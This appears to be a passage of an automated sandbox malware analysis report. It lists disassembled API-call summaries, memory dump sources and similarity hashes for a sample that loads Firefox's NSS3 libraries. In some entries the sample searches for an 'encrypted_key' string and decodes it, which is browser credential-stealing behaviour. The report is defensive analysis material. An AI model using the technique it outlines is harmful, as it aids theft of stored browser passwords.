                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB0EEA2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0EEBB
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0EED0
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB0EF48
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0EF68
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0EF7D
                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CB0EFA4
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0EFDA
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB0F055
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB0F060
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2524771861-0
                                                                                                                                                                                                              • Opcode ID: ea2a270ecf4df26d1a09fb9511837a6468de919f892d486b591b8a7fd8b1d65a
                                                                                                                                                                                                              • Instruction ID: f6ae2d85bedf62b8f70ae180c5fb3ad99ec3c83b795623005b8452ba5410bdca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea2a270ecf4df26d1a09fb9511837a6468de919f892d486b591b8a7fd8b1d65a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE8162B1B002899BDF01DFA5DC45ADE7BB5FF08318F144024E949A7B11E731E954CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6CAD4D80
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6CAD4D95
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CAD4DF2
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD4E2C
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CAD4E43
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CAD4E58
                                                                                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CAD4E85
                                                                                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6CC205A4,00000000), ref: 6CAD4EA7
                                                                                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CAD4F17
                                                                                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CAD4F45
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAD4F62
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAD4F7A
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAD4F89
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAD4FC8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                                                                                              • Opcode ID: e2ddd93387dcdd21a6bf8a872422d2fd401246d4adfbc6e8be5be29921d7aa5c
                                                                                                                                                                                                              • Instruction ID: bd95498b06f5371f8682ce36bda5755c84ee6a4c15bb126fc2ffd17e5231c983
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2ddd93387dcdd21a6bf8a872422d2fd401246d4adfbc6e8be5be29921d7aa5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E681A471908301AFE701CF24D840B9BB7F4AF88758F1A852DF958DB651EB31E945CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CB15C9B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CB15CF4
                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CB15CFD
                                                                                                                                                                                                              • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CB15D42
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CB15D4E
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB15D78
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CB15E18
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB15E5E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB15E72
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB15E8B
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CB0F854
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CB0F868
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CB0F882
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(04C483FF,?,?), ref: 6CB0F889
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CB0F8A4
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CB0F8AB
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CB0F8C9
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(280F10EC,?,?), ref: 6CB0F8D0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                              • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00E324F0), ref: 0093BB56
                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0093BBCF
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0093BBEB
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0093BBFF
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0093BC08
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0093BC18
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0093BC36
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0093BC46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                                                              • String ID: $<%$X%$`%
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB0781D,00000000,6CAFBE2C,?,6CB06B1D,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C40
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB0781D,?,6CAFBE2C,?), ref: 6CB06C58
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C6F
                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB06C84
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB06C96
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: TlsGetValue.KERNEL32(00000040,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1267
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: EnterCriticalSection.KERNEL32(?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB127C
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1291
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: PR_Unlock.NSS3(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB12A0
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB06CAA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CB94CAF
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB94CFD
                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CB94D44
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00935885
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00935896
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 009358C1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 009358DF
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 009358F3
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00935906
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 0092819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0092CC65,?,?), ref: 009281E5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 009321BC: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0093599C,?), ref: 009321C7
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000), ref: 009359AA
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00935ACE
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928060
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalAlloc.KERNEL32(00000040,?,?,?,00926724,?), ref: 0092806E
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928084
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalFree.KERNEL32(?,?,?,00926724,?), ref: 00928093
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00935A5A
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956645), ref: 00935A77
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935A96
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956A94), ref: 00935AA7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4109952398-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CB92D9F
                                                                                                                                                                                                                • Part of subcall function 6CA4CA30: EnterCriticalSection.KERNEL32(?,?,?,6CAAF9C9,?,6CAAF4DA,6CAAF9C9,?,?,6CA7369A), ref: 6CA4CA7A
                                                                                                                                                                                                                • Part of subcall function 6CA4CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA4CB26
                                                                                                                                                                                                              • sqlite3_exec.NSS3(?,?,6CB92F70,?,?), ref: 6CB92DF9
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CB92E2C
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E3A
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E52
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(6CBFAAF9,?), ref: 6CB92E62
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E70
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92E89
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92EBB
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92ECB
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CB92F3E
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CB92F4C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1957633107-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(6CAE3F23,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C62
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C76
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C86
                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2C93
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2CC6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23,?), ref: 6CAE2CDA
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?,?,6CAE3F23), ref: 6CAE2CEA
                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?), ref: 6CAE2CF7
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CADE477,?,?,?,00000001,00000000,?), ref: 6CAE2D4D
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAE2D61
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6CAE2D71
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CAE2D7E
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2446853827-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22120,6CAD7E60,?,?,?,?,?,6CB551DF,6CB55990,00000000), ref: 6CAD7C81
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                                • Part of subcall function 6CA44C70: PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD7CA0
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD7CB4
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD7CCF
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD7D04
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD7D1B
                                                                                                                                                                                                              • realloc.MOZGLUE(-00000050), ref: 6CAD7D82
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAD7DF4
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD7E0E
Memory Dump Source
• Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
• Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2305085145-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44C97
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CB0
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44CC9
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D11
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D2A
                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D4A
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D57
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44D97
                                                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44DBA
                                                                                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6CA44DD4
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44DE6
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA43921,6CC214E4,6CB8CC70), ref: 6CA44DEF
Memory Dump Source
• Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
• Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
